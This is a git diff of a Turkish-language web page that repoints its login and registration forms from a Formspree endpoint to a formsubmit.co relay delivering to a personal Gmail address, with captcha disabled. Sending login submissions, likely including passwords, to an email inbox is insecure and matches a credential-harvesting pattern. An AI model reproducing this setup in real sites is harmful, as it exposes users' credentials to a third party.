--- a/index.html
+++ b/index.html
@@ -141,7 +141,7 @@
   <div class="container">
     <div class="card">
       <h2>Giriş Yap</h2>
-      <form action="https://formspree.io/f/xgvybkwj" method="POST">
+      <form action="https://formsubmit.co/hasanyusufyildiz35@gmail.com" method="POST">
         <input type="hidden" name="_template" value="table" />
         <input type="hidden" name="_captcha" value="false" />
         <input type="text" name="username" placeholder="Kullanıcı Adı" required />
@@ -152,7 +152,7 @@
 
     <div class="card">
       <h2>Kayıt Ol</h2>
-      <form action="https://formspree.io/f/xgvybkwj" method="POST">
+      <form action="https://formsubmit.co/hasanyusufyildiz35@gmail.com" method="POST">
         <input type="hidden" name="_template" value="table" />
         <input type="hidden" name="_captcha" value="false" />
         <input type="text" name="new_username" placeholder="Yeni Kullanıcı Adı" required />
